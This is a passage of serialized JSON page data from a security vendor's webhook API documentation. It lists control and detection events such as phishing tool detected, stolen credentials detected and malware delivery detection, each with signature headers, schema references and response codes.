event"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_751","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_751"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/mfa-enforcement/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/mfa-enforcement-event"}],"panels":[]}]},"httpPath":"mfa-enforcement"},{"label":"Password logging prevention","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/password-logging-prevention-event","routeSlug":"/webhooks-v1/controls/password-logging-prevention-event","metadata":{"seo":{"title":"Password logging prevention","description":"Password logging prevention"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"password-logging-prevention-event","name":"Password logging prevention","isWebhook":true,"pointer":"/paths/password-logging-prevention-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Password logging prevention","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/password-logging-prevention-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_752"}},"schemaId":"schema_752","pointer":"/paths/password-logging-prevention-detected/post/requestBody","description":"A password was entered into a non password field."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"password-logging-prevention-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_752"}},"responseCodes":["2XX"],"pointer":"password-logging-prevention-detected","href":"controls/password-logging-prevention-event","openApiOperationId":"password-logging-prevention-event","summary":"Password logging prevention"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_752","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_752"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/password-logging-prevention-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/password-logging-prevention-event"}],"panels":[]}]},"httpPath":"password-logging-prevention-detected"},{"label":"Phishing tool detected","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/phishing-tool-detected-event","routeSlug":"/webhooks-v1/controls/phishing-tool-detected-event","metadata":{"seo":{"title":"Phishing tool detected","description":"Phishing tool detected"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-tool-detected-event","name":"Phishing tool detected","isWebhook":true,"pointer":"/paths/phishing-tool-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing tool detected","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-tool-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_753"}},"schemaId":"schema_753","pointer":"/paths/phishing-tool-detected/post/requestBody","description":"A phishing tool detected event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-tool-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_753"}},"responseCodes":["2XX"],"pointer":"phishing-tool-detected","href":"controls/phishing-tool-detected-event","openApiOperationId":"phishing-tool-detected-event","summary":"Phishing tool detected"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_753","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_753"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-tool-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/phishing-tool-detected-event"}],"panels":[]}]},"httpPath":"phishing-tool-detected"},{"label":"Protected password entered","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/protected-password-entered-event","routeSlug":"/webhooks-v1/controls/protected-password-entered-event","metadata":{"seo":{"title":"Protected password entered","description":"Protected password entered"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"protected-password-entered-event","name":"Protected password entered","isWebhook":true,"pointer":"/paths/protected-password-entered/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Protected password entered","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/protected-password-entered/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_754"}},"schemaId":"schema_754","pointer":"/paths/protected-password-entered/post/requestBody","description":"A protected password entered event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"protected-password-entered","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_754"}},"responseCodes":["2XX"],"pointer":"protected-password-entered","href":"controls/protected-password-entered-event","openApiOperationId":"protected-password-entered-event","summary":"Protected password entered"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_754","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_754"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/protected-password-entered/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/protected-password-entered-event"}],"panels":[]}]},"httpPath":"protected-password-entered"},{"label":"Stolen credentials detected","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/stolen-credentials-detected","routeSlug":"/webhooks-v1/controls/stolen-credentials-detected","metadata":{"seo":{"title":"Stolen credentials detected","description":"Stolen credentials detected"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"stolen-credentials-detected","name":"Stolen credentials detected","isWebhook":true,"pointer":"/paths/stolen-credentials-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Stolen credentials detected","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/stolen-credentials-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_755"}},"schemaId":"schema_755","pointer":"/paths/stolen-credentials-detected/post/requestBody","description":"A stolen credentials event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"stolen-credentials-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_755"}},"responseCodes":["2XX"],"pointer":"stolen-credentials-detected","href":"controls/stolen-credentials-detected","openApiOperationId":"stolen-credentials-detected","summary":"Stolen credentials detected"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_755","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_755"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/stolen-credentials-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/stolen-credentials-detected"}],"panels":[]}]},"httpPath":"stolen-credentials-detected"},{"label":"Strong password enforcement event","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/strong-password-enforcement-event","routeSlug":"/webhooks-v1/controls/strong-password-enforcement-event","metadata":{"seo":{"title":"Strong password enforcement event","description":"Strong password enforcement event"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"strong-password-enforcement-event","name":"Strong password enforcement event","isWebhook":true,"pointer":"/paths/strong-password-enforcement/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Strong password enforcement event","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/strong-password-enforcement/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_756"}},"schemaId":"schema_756","pointer":"/paths/strong-password-enforcement/post/requestBody","description":"A strong password enforcement event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"strong-password-enforcement","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_756"}},"responseCodes":["2XX"],"pointer":"strong-password-enforcement","href":"controls/strong-password-enforcement-event","openApiOperationId":"strong-password-enforcement-event","summary":"Strong password enforcement event"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_756","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_756"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/strong-password-enforcement/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/strong-password-enforcement-event"}],"panels":[]}]},"httpPath":"strong-password-enforcement"},{"label":"SSO password used","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/sso-password-used-event","routeSlug":"/webhooks-v1/controls/sso-password-used-event","metadata":{"seo":{"title":"SSO password used","description":"SSO password used"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-used-event","name":"SSO password used","deprecated":true,"isWebhook":true,"pointer":"/paths/phishing/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password used","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_757"}},"schemaId":"schema_757","pointer":"/paths/phishing/post/requestBody","description":"An SSO password used event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_757"}},"responseCodes":["2XX"],"pointer":"phishing","href":"controls/sso-password-used-event","openApiOperationId":"sso-password-used-event","summary":"SSO password used"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_757","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_757"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/sso-password-used-event"}],"panels":[]}]},"httpPath":"phishing"}],"content":{"contentType":"group","meta":{"name":"Controls"},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Controls","showPageActions":true},{"nodeType":"markdoc","content":"Events related to any of the control features."}],"panels":[{"children":[{"kind":"group-items","title":"Webhooks","titleTranslationKey":"webhooks","items":[{"title":"app-banner","summary":"App banner","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/app-banner-event","deprecated":false},{"title":"blocked-url-visited","summary":"Blocked URL visited","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/blocked-url-visited-event","deprecated":false},{"title":"browser-extension-state-enforcement-event","summary":"Browser extension blocked or enabled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/browser-extension-state-enforcement-event","deprecated":false},{"title":"clipboard-blocking-event","summary":"Clipboard blocking","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/clipboard-blocking-event","deprecated":false},{"title":"cloned-login-page-detected","summary":"Cloned login page detected","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/cloned-login-page-detected-event","deprecated":false},{"title":"custom-detection-detected","summary":"Custom detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/custom-detection-detected-event","deprecated":false},{"title":"domain-category-blocking-event","summary":"Domain category blocking triggered","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/domain-category-blocking-event","deprecated":false},{"title":"file-download-blocking","summary":"File download blocking","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/file-download-blocking-event","deprecated":false},{"title":"file-upload-blocking","summary":"File upload blocking","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/file-upload-blocking-event","deprecated":false},{"title":"malicious-browser-extension-detected-event","summary":"Malicious browser extension detected","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/malicious-browser-extension-detected-event","deprecated":false},{"title":"malicious-copy-paste-detected","summary":"Malicious copy and paste detected","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/malicious-copy-paste-detected-event","deprecated":false},{"title":"mfa-enforcement","summary":"MFA enforcement event","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/mfa-enforcement-event","deprecated":false},{"title":"password-logging-prevention-detected","summary":"Password logging prevention","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/password-logging-prevention-event","deprecated":false},{"title":"phishing-tool-detected","summary":"Phishing tool detected","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/phishing-tool-detected-event","deprecated":false},{"title":"protected-password-entered","summary":"Protected password entered","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/protected-password-entered-event","deprecated":false},{"title":"stolen-credentials-detected","summary":"Stolen credentials detected","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/stolen-credentials-detected","deprecated":false},{"title":"strong-password-enforcement","summary":"Strong password enforcement event","prefix":{"name":"post","color":"post"},"badges":[],"link":"/controls/strong-password-enforcement-event","deprecated":false},{"title":"phishing","summary":"SSO password used","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/controls/sso-password-used-event","deprecated":true}]}]}]}]}},{"type":"group","label":"Detections","link":"/webhooks-v1/detections","routeSlug":"/webhooks-v1/detections","items":[{"label":"Blocked URL detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/blocked-url-detection-event","routeSlug":"/webhooks-v1/detections/blocked-url-detection-event","metadata":{"seo":{"title":"Blocked URL detection","description":"Blocked URL detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"blocked-url-detection-event","name":"Blocked URL detection","isWebhook":true,"pointer":"/paths/blocked-url-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Blocked URL detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/blocked-url-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_758"}},"schemaId":"schema_758","pointer":"/paths/blocked-url-detection/post/requestBody","description":"A blocked URL detection occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"blocked-url-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_758"}},"responseCodes":["2XX"],"pointer":"blocked-url-detection","href":"detections/blocked-url-detection-event","openApiOperationId":"blocked-url-detection-event","summary":"Blocked URL detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_758","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_758"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/blocked-url-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/blocked-url-detection-event"}],"panels":[]}]},"httpPath":"blocked-url-detection"},{"label":"Custom detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/custom-detection-event","routeSlug":"/webhooks-v1/detections/custom-detection-event","metadata":{"seo":{"title":"Custom detection","description":"Custom detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-detection-event","name":"Custom detection","isWebhook":true,"pointer":"/paths/custom-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_759"}},"schemaId":"schema_759","pointer":"/paths/custom-detection/post/requestBody","description":"A detection event for a custom rule occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_759"}},"responseCodes":["2XX"],"pointer":"custom-detection","href":"detections/custom-detection-event","openApiOperationId":"custom-detection-event","summary":"Custom detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_759","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_759"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/custom-detection-event"}],"panels":[]}]},"httpPath":"custom-detection"},{"label":"Malicious browser extension detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/malicious-browser-extension-detection-event","routeSlug":"/webhooks-v1/detections/malicious-browser-extension-detection-event","metadata":{"seo":{"title":"Malicious browser extension detection","description":"Malicious browser extension detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-browser-extension-detection-event","name":"Malicious browser extension detection","isWebhook":true,"pointer":"/paths/malicious-browser-extension-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious browser extension detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-browser-extension-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_760"}},"schemaId":"schema_760","pointer":"/paths/malicious-browser-extension-detection/post/requestBody","description":"A malicious browser extension detection occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-browser-extension-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_760"}},"responseCodes":["2XX"],"pointer":"malicious-browser-extension-detection","href":"detections/malicious-browser-extension-detection-event","openApiOperationId":"malicious-browser-extension-detection-event","summary":"Malicious browser extension detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_760","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_760"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-browser-extension-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/malicious-browser-extension-detection-event"}],"panels":[]}]},"httpPath":"malicious-browser-extension-detection"},{"label":"Malware delivery detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/malware-delivery-detection-event","routeSlug":"/webhooks-v1/detections/malware-delivery-detection-event","metadata":{"seo":{"title":"Malware delivery detection","description":"Malware delivery detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malware-delivery-detection-event","name":"Malware delivery detection","isWebhook":true,"pointer":"/paths/malware-delivery-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malware delivery detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malware-delivery-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request 